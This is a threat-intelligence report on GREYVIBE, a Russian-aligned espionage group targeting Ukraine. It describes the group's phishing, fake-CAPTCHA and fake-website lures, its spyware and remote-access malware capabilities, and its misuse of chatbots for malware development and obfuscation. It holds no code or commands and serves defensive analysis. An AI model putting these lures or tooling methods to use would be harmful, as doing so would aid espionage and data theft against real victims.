GREYVIBE Threat Actor

A previously unidentified threat actor known as GREYVIBE has been linked to a sustained cyber-espionage campaign targeting Ukraine and organizations connected to the country since at least August 2025. Analysis suggests the group operates primarily within the Russian time zone and communicates in Russian. Its activities closely align with Russian state interests, particularly intelligence collection efforts related to the ongoing Russo-Ukrainian conflict.

GREYVIBE has targeted a broad range of sectors, including military institutions, government agencies, civilian organizations, and private businesses. While the group's operations display characteristics associated with nation-state activity, evidence also indicates connections to the wider Russian cybercriminal landscape through individuals believed to be current or former cybercrime actors.

Diverse Infection Methods and Custom Malware Arsenal

The threat actor employs a variety of delivery mechanisms to compromise victims. These include highly targeted spear-phishing campaigns, deceptive CAPTCHA verification pages, and fraudulent Ukrainian-themed adult entertainment websites. Across its operations, GREYVIBE consistently relies on internally developed malware, loaders, and obfuscation tools to evade detection and maintain access to compromised systems.

Several distinct attack frameworks have been observed:

• PhantomMail distributes malicious ZIP and RAR archives through spear-phishing emails containing links hosted on Google Drive and 4sync. These archives include JavaScript loaders that launch decoy documents while deploying PhantomRelay, a PowerShell-based remote access trojan (RAT) capable of system reconnaissance and remote command execution.
• PhantomClick leverages ClickFix-style fake CAPTCHA pages hosted on domains impersonating services such as Zoom and LAPAS. Victims are manipulated into executing commands that trigger the PhantomRelay infection chain.
• PrincessClub uses counterfeit Ukrainian adult-club websites to distribute FallSpy spyware on Android devices and either PhantomRelayV1 or LegionRelay on Windows systems. Later versions of these websites incorporated WebRTC-based live-call functionality to capture victims' audio and video. FallSpy is capable of collecting sensitive information from infected Android devices, while LegionRelay supports file discovery, data theft, screenshot capture, browser credential extraction, Telegram and WhatsApp data collection, and Remote Desktop Protocol (RDP) configuration. PhantomRelayV1 expands on the original PhantomRelay by adding a custom watchdog persistence mechanism.
• DroneLink masquerades as charitable organizations supporting the Armed Forces of Ukraine and delivers WireGuard alongside LegionRelay.
• Nebo deploys a FallSpy variant disguised as a Russian-language login portal, likely intended to deceive Ukrainian military personnel into believing they are accessing a legitimate Russian military system.

Artificial Intelligence as a Force Multiplier

One of the most notable aspects of GREYVIBE's operations is its apparent reliance on generative artificial intelligence and large language models to enhance offensive capabilities. Evidence suggests the group has utilized platforms such as Ideogram AI, OpenAI ChatGPT, and Google Gemini to assist with image generation, malware development, script obfuscation, backend infrastructure creation, and post-compromise operations.

This AI-assisted approach offers several operational advantages. It helps compensate for technical skill gaps, accelerates development cycles, and reduces dependence on previously identified malware families and tools that could facilitate attribution.

The increasing use of AI within cyber operations presents a significant challenge for defenders. Threat actors can rapidly generate, modify, or replace components of their toolsets, reducing the effectiveness of traditional attribution methods that rely on stable technical indicators and recurring malware artifacts.

Operational Weaknesses Reveal Development Gaps

Despite benefiting from AI-assisted development, GREYVIBE has demonstrated multiple operational security shortcomings. Researchers identified design flaws within LegionRelay that inadvertently exposed backend functionality, providing insight into the malware's internal operations.

Such mistakes are generally uncommon among highly sophisticated state-sponsored actors, suggesting that GREYVIBE may not represent a traditional intelligence service operation. Instead, the group appears to possess low-to-moderate technical sophistication while leveraging AI technologies to enhance capabilities beyond its inherent skill level.

Indicators of Cybercriminal Connections

Multiple findings suggest that GREYVIBE maintains links to the broader Russian cybercrime ecosystem:

• Access to or use of an ISO-building utility associated with suspected ties to the TrickBot gang and UAC-0098.
• Detection of PhantomRelay variants within seemingly unrelated cybercriminal campaigns, including Microsoft Teams voice-phishing operations conducted between July 2025 and February 2026 and KongTuke delivery campaigns observed between February and March 2026 that employed ClickFix techniques.
• Uploads of early-stage development and testing samples.
• Use of informal internet slang such as 'letsrollboyos,' 'totallyunsus,' and 'cuteuwu' in development artifact naming conventions.
• Deployment of the XMRig cryptocurrency miner on a limited number of systems infected with LegionRelay.

These indicators support a moderate-confidence assessment that GREYVIBE has meaningful ties to cybercriminal networks and a low-to-moderate confidence assessment that some members may currently be, or previously were, involved in cybercrime activities.

Blurring the Line Between State and Criminal Operations

The precise nature of GREYVIBE's relationship with the Russian state remains uncertain. Several possibilities exist, including integration of cybercriminal personnel into a state-backed organization, independent operators carrying out state-directed tasks, or the formation of a hybrid structure that combines criminal and state-affiliated elements.

As a result, GREYVIBE occupies a complex space between traditional cybercrime and government-linked cyber operations. This overlap complicates attribution efforts and highlights the increasingly blurred boundaries between financially motivated cybercriminal activity and state-sponsored intelligence operations.